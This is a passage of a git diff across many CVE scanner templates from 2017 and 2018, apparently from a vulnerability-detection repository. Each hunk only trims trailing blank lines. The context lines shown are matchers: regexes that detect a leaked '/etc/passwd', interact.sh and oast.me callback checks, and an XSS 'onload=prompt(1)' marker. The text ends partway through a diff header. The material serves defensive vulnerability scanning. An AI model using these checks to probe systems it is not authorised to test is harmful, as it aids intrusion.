b/http/cves/2017/CVE-2017-10271.yaml index 06a12fd1b7..711d984e34 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -97,5 +97,3 @@ http: - body == "{{randstr}}" - status_code == 200 condition: and - - diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 807db28835..47f6696f84 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -37,5 +37,3 @@ http: - type: dsl dsl: - '!contains(tolower(body), "" - "" condition: and - - diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index c10fec57cf..57c5902a9e 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 0964e963e0..0288a3ec1d 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -37,5 +37,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index e29104b974..a536fa59cd 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -53,5 +53,3 @@ http: status: - 200 - 500 - - diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 7bb7b20946..611503605c 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 794adb7b24..70f896dd8f 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 0fba7d49e6..90808b70d6 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 3580217dd7..4306d4d49b 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 5fda73b950..4abf222789 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -58,5 +58,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index 9c54d8030e..e367edb09f 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -43,5 +43,3 @@ http: group: 1 regex: - '"name"\:"(.*?)"' - - diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 3c4d30fdde..6ddb4d7ad9 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -53,5 +53,3 @@ http: status: - 201 - 409 - - diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 113f9141da..14e05bd5a4 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -37,5 +37,3 @@ http: - "META-INF" condition: and part: body - - diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index b84fe0b56f..9852dc47d1 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -40,5 +40,3 @@ http: words: - "text/html" part: header - - diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index ef2aaa1c52..08f1a07640 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -43,5 +43,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index c70b6daddd..62549778a6 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 39704d1866..81b8eb1419 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -30,5 +30,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' - - diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 498f7e1a20..7449d0c515 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 77852b6eba..f3040c18eb 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -53,5 +53,3 @@ http: regex: - "root:.*:0:0:" part: body - - diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index f62f6b20a3..c43bd2089c 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -45,5 +45,3 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and - - diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 9c8cafaa50..bc149ef0b2 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -39,5 +39,3 @@ http: words: - "text/html" part: header - - diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 5aadf04c1b..8751329f8d 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -32,5 +32,3 @@ http: regex: - "root:.*:0:0:" part: body - - diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 0db3c09730..23ca464303 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -30,5 +30,3 @@ http: - type: word words: - 'Unknown command: ' - - diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 684b9f9465..80ff0777af 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 3de4572bf6..43c11e6592 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index c05054b9c2..93ba155e54 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -48,5 +48,3 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' - - diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index a7586748f7..9cbba50286 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 87121962d2..9faebd146b 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -36,6 +36,3 @@ http: - "\\[(font|extension|file)s\\]" condition: or part: body - - - diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 2f85ca3c43..9b43e325df 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 72d07351c9..e24abf7458 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -47,5 +47,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 99b983c389..b043ddfa8d 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 06ee13b266..06019b8063 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index bde243a6f0..8d82d9b3ea 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 9a8c872fa0..7cf3385dd1 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -109,4 +109,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 3c2786c563..82d1dea866 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -40,5 +40,3 @@ http: - "Database Setup" - "SQLServer" condition: and - - diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 688b2eb345..c00441e25c 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -44,5 +44,3 @@ http: part: header words: - "text/html" - - diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 69e1d81d7d..4ad2aa8cf6 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 3105e4a9cb..a532f0fd49 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -37,5 +37,3 @@ http: part: body words: - "console.log" - - diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 3e689d2374..363be74494 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -32,5 +32,3 @@ http: part: interactsh_protocol words: - "http" - - diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 12b9ca667c..95d3ba460c 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -48,5 +48,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 5dd2874975..068bb0f0ac 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -29,5 +29,3 @@ http: words: - 'noresize src="/\interact.sh?configName=' part: body - - diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 4cb1be3626..f5addf6b5d 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -36,5 +36,3 @@ http: part: header words: - "text/html" - - diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 47c4703c0a..f90d19bd82 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -55,5 +55,3 @@ http: json: - '.[] | .slug' - '.[].name' - - diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index f55f3321c6..9ee42021b0 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 075cd964dc..70399dd74a 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index d8f6c5d6a8..7169cd0706 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index b28d07f5c0..f6769d355d 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 81db0d2b4a..4cddc250c4 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 112e238428..0fb85adfeb 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 5737c5113a..e57fb17702 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -43,5 +43,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index baa48f30d8..926d22758b 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -39,5 +39,3 @@ http: part: header words: - "text/html" - - diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 720a8b9d0f..813b4721eb 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 522e738c3e..8a3ffec857 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -34,5 +34,3 @@ http: words: - "application/xml" part: header - - diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 6f679570c0..7f9f0f3d9b 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -34,5 +34,3 @@ http: part: body words: - '{{md5(num)}}' - - diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index d1d3358f1e..81889522ac 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -36,5 +36,3 @@ http: - '#000000"onload="prompt(1)' - 'Telerik.ReportViewer.axd?name=Resources' condition: and - - diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 3b9767a1e5..155a87a2b3 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 02868fd71c..56734d9b5b 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -41,5 +41,3 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and - - diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index fc43a2b56a..291b81f707 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -32,5 +32,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index fee4538b02..e7a4823c1f 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -52,5 +52,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index d1e1b5198a..7aa96e2b33 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -96,5 +96,3 @@ http: - type: status status: - 500 - - diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index c7bdaefa69..11e25e420d 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 404 - - diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 29d12b0a34..903ce2485e 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index a8ffc2ba7d..c06660b380 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -76,5 +76,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 42865d8e5c..90a739e31e 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -39,5 +39,3 @@ http: - "MDM" - "cisco" - "admin" - - diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index da8bbe9ffc..a75fb12af8 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index cc6c08e46d..3c4db646de 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -47,5 +47,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 09bbe031ef..a6e17652e4 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -45,5 +45,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index b3c820fbef..6db4bd4968 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -61,5 +61,3 @@ http: part: body regex: - "(.*[a-zA-Z0-9].+==)" - - diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 713e9a3018..1980dbd067 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -48,5 +48,3 @@ http: words: - "root:/root:/bin/bash" part: body - - diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 28bc700f75..828b660f02 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -30,5 +30,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 4b7441854e..602d4e3a03 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -30,5 +30,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 7ac55e8737..b0b76eeeae 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -58,5 +58,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 58d280b923..67d5769414 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 99c8705eed..4273463bec 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index c394a5750b..1273af5a80 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -40,5 +40,3 @@ http: part: header words: - text/html - - diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 1b848a4961..d167202ec1 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 058e72da0a..c3ea669cef 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -36,5 +36,3 @@ http: - "fonts" - "extensions" condition: and - - diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index e46aa3cf15..87485aa36f 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index b108a4dd55..fcb271bd0f 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -48,5 +48,3 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" - - diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index e4dea9ae2f..cdd181294b 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -46,5 +46,3 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" - - diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 4f8bf37a6d..5a3f6975c5 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 4058148fe9..2baa18175b 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 50415fc702..914c36795e 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 212943aab9..45cd14d7f4 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index a1ca48454b..a2401ed241 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -43,5 +43,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index ce12c1d88e..d2076761f0 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -32,5 +32,3 @@ http: - type: word words: - licenseKeys - - diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index a3a65ca447..2043ac7df7 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -62,5 +62,3 @@ http: regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true - - diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index eae46501ab..79108b6df7 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 296aa16c2c..9eee07e449 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 8542c2a01b..1b8a9c573a 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 422cf2f318..bd2d4d393c 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 04745153d6..06ad0854d8 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -31,5 +31,3 @@ http: words: - "calling init: /lib/" part: response - - diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index bfe8b3b132..3f4bf07cb4 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index d151b265f8..1ead21f04f 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -38,5 +38,3 @@ http: group: 1 regex: - '"version": "([0-9.]+)"' - - diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 2d1f8c82c6..cf425691b2 100644 --- 